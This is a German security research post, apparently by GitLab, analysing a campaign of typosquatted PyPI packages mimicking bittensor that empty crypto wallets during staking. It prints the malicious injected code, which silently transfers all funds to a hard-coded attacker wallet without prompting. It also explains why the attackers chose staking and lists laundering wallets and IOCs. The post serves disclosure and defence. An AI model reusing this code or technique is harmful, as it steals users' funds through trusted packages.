Veröffentlicht am: 6. August 2025
5 Minuten Lesezeit
Das Vulnerability Research Team von GitLab identifizierte eine Supply-Chain-Angriffskampagne, die Typosquatting-PyPI-Pakete verwendet, um Kryptowährung aus Bittensor-Wallets durch Manipulation von Staking-Operationen zu stehlen.
Das Vulnerability Research Team von GitLab hat eine ausgeklügelte
Kryptowährungs-Diebstahlkampagne identifiziert, die das Bittensor-Ökosystem
durch Typosquatting-Python-Pakete auf PyPI ins Visier nimmt.
Die Untersuchung begann, als das automatisierte Paket-Überwachungssystem von GitLab verdächtige Aktivitäten im Zusammenhang mit beliebten Bittensor-Paketen meldete. Es wurden mehrere Typosquatting-Varianten legitimer Bittensor-Pakete entdeckt, die jeweils darauf ausgelegt waren, Kryptowährung von ahnungslosen Entwickler(inne)n und Nutzer(inne)n zu stehlen.
Geschäftsrelevanz: Dieser koordinierte Angriff zeigt, wie Cyberkriminelle systematisch vertrauensvolle Software-Ökosysteme ausnutzen. 90% der Fortune-500-Unternehmen nutzen Open-Source-Komponenten - jede davon ist ein potentieller Angriffspunkt für ähnliche Kampagnen.
Die identifizierten bösartigen Pakete wurden alle innerhalb eines 25-minütigen Zeitfensters am 6. August 2025 veröffentlicht:
[email protected]
(02:52 UTC)
[email protected]
(02:59 UTC)
[email protected]
(03:02 UTC)
[email protected]
(03:15 UTC)
[email protected]
(03:16 UTC)
Alle Pakete wurden entwickelt, um die legitimen bittensor
- und bittensor-cli
-Pakete nachzuahmen, die Kernkomponenten des dezentralisierten KI-Netzwerks Bittensor sind.
Die Analyse offenbarte einen sorgfältig ausgearbeiteten Angriffsvektor, bei dem die Angreifer legitime Staking-Funktionalitäten modifizierten, um Gelder zu stehlen. Die bösartigen Pakete enthalten eine manipulierte Version der stake_extrinsic
-Funktion in bittensor_cli/src/commands/stake/add.py
.
Wo Nutzer(innen) eine normale Staking-Operation erwarten, haben die Angreifer in Zeile 275 bösartigen Code eingefügt, der stillschweigend alle Gelder in ihre Wallet umleitet:
result = await transfer_extrinsic(
subtensor=subtensor,
wallet=wallet,
destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
amount=amount,
transfer_all=True,
prompt=False
)
Diese bösartige Injektion untergräbt den Staking-Prozess vollständig:
Stille Ausführung: Verwendet prompt=False
, um die Benutzerbestätigung zu umgehen
Vollständige Wallet-Entleerung: Setzt transfer_all=True
, um alle verfügbaren Gelder zu stehlen, nicht nur den Staking-Betrag
Hartcodiertes Ziel: Leitet alle Gelder an die Wallet-Adresse der Angreifer weiter
Versteckt in Sichtweite: Wird während einer scheinbar normalen Staking-Operation ausgeführt
Das Perfide an diesem Angriff: Nutzer(innen) glauben, Token für Belohnungen zu staken, während die modifizierte Funktion stattdessen die gesamte Wallet entleert.
Diese Angriffsmethodik ist nicht auf Kryptowährungen beschränkt. Ähnliche Typosquatting-Strategien könnten manipulierte Pakete in geschäftskritische Systeme einschleusen - von Zahlungsverarbeitung bis hin zu Industriesteuerungen.
Die Angreifer scheinen gezielt Staking-Operationen aus kalkulierten Gründen ins Visier genommen zu haben. In Blockchain-Netzwerken wie Bittensor bedeutet Staking, dass Nutzer(innen) ihre Kryptowährungs-Token sperren, um Netzwerkoperationen zu unterstützen und im Gegenzug Belohnungen zu erhalten – ähnlich wie Zinsen auf eine Einlage.
Dies macht Staking zu einem idealen Angriffsvektor:
Hochwertige Ziele: Nutzer(innen), die staken, besitzen typischerweise erhebliche Kryptowährungsbestände, was sie zu lukrativen Opfern macht.
Erforderlicher Wallet-Zugriff: Staking-Operationen erfordern, dass Nutzer(innen) ihre Wallets entsperren und Authentifizierung bereitstellen – genau das, was der bösartige Code benötigt, um Gelder abzuziehen.
Erwartete Netzwerkaktivität: Da Staking natürlich Blockchain-Transaktionen beinhaltet, erregt die zusätzliche bösartige Übertragung nicht sofort Verdacht.
Routineoperationen: Erfahrene Nutzer(innen) staken regelmäßig, was Vertrautheit schafft, die zu Nachlässigkeit führt und die Aufmerksamkeit reduziert.
Verzögerte Entdeckung: Nutzer(innen) könnten anfänglich annehmen, dass Saldoänderungen normale Staking-Gebühren oder temporäre Sperrungen sind, was die Entdeckung des Diebstahls verzögert.
Durch das Verstecken von bösartigem Code in legitim aussehender Staking-Funktionalität nutzten die Angreifer sowohl die technischen Anforderungen als auch die Nutzerpsychologie von Routine-Blockchain-Operationen aus.
Das Vulnerability Research Team von GitLab verfolgte die Kryptowährungsflüsse, um das volle Ausmaß dieser Operation zu verstehen. Die primäre Ziel-Wallet 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR
diente als zentraler Sammelpunkt, bevor die Gelder durch ein Netzwerk von Zwischen-Wallets verteilt wurden.
Die Analyse offenbarte ein mehrstufiges Geldwäschesystem:
Primäre Sammlung: Gestohlene Gelder kommen zunächst bei 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR
an
Verteilungsnetzwerk: Gelder werden schnell zu Zwischen-Wallets verschoben, einschließlich:
5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP1
5GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC
5ER5ojwWNF79k5wvsJhcgvWmHkhKfW5tCFzDpj1Wi4oUhPs6
5CquBemBzAXx9GtW94qeHgPya8dgvngYXZmYTWqnpea5nsiL
Finale Konsolidierung: Alle Pfade konvergieren schließlich bei 5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu
Auszahlungsendpunkt: Das finale Ziel scheint
5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ
zu sein
Die Angreifer verwendeten eine Typosquatting-Strategie, die häufige Tippfehler und Paket-Namenskonventionen ausnutzt:
Fehlende Zeichen: bitensor
statt bittensor
(fehlendes 't')
Kürzung: bittenso
statt bittensor
(fehlendes finales 'r')
Versions-Nachahmung: Alle Pakete verwendeten Versionsnummern (9.9.4
, 9.9.5
), die den legitimen Paketversionen sehr ähnlich sind
Dieser Ansatz maximiert die Installationswahrscheinlichkeit durch Entwickler-Tippfehler während pip install
-Befehlen und Copy-Paste-Fehler aus Dokumentationen.
GitLab investiert weiterhin in proaktive Sicherheitsforschung, um Bedrohungen zu identifizieren und zu neutralisieren, bevor sie die Community beeinträchtigen. Das automatisierte Erkennungssystem arbeitet rund um die Uhr, um die Software-Supply-Chain zu schützen, die die moderne Entwicklung antreibt.
Die schnelle Erkennung und Analyse dieses Angriffs demonstriert den Wert proaktiver Sicherheitsmaßnahmen im Kampf gegen ausgeklügelte Bedrohungen. Durch das Teilen der Erkenntnisse streben wir danach, die Widerstandsfähigkeit des gesamten Ökosystems gegen zukünftige Angriffe zu stärken.
| IOC | Beschreibung |
| -------------------------------------------------- | ----------------------------------------------------------------- |
| pkg:pypi/[email protected]
| Bösartiges PyPI-Paket |
| pkg:pypi/[email protected]
| Bösartiges PyPI-Paket |
| pkg:pypi/[email protected]
| Bösartiges PyPI-Paket |
| pkg:pypi/[email protected]
| Bösartiges PyPI-Paket |
| pkg:pypi/[email protected]
| Bösartiges PyPI-Paket |
| 5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR
| Bittensor (TAO) Wallet-Adresse für den Empfang gestohlener Gelder |
| Datum & Uhrzeit | Aktion |
| -------------------- | --------------------------------------------------------------------------------------------- |
| 2025-08-06T06:33 | Erste Analyse verdächtiger Pakete, die vom automatisierten Überwachungssystem gemeldet wurden |
| 2025-08-06T09:42 | [email protected]
an PyPi.org gemeldet |
| 2025-08-06T09:46 | [email protected]
an PyPi.org gemeldet |
| 2025-08-06T09:47 | [email protected]
an PyPi.org gemeldet |
| 2025-08-06T09:49 | [email protected]
an PyPi.org gemeldet |
| 2025-08-06T09:51 | [email protected]
an PyPi.org gemeldet |
| 2025-08-06T15:26 | PyPi.org entfernte [email protected]
|
| 2025-08-06T15:27 | PyPi.org entfernte [email protected]
|
| 2025-08-06T15:27 | PyPi.org entfernte [email protected]
|
| 2025-08-06T15:28 | PyPi.org entfernte [email protected]
|
| 2025-08-06T15:28 | PyPi.org entfernte [email protected]
|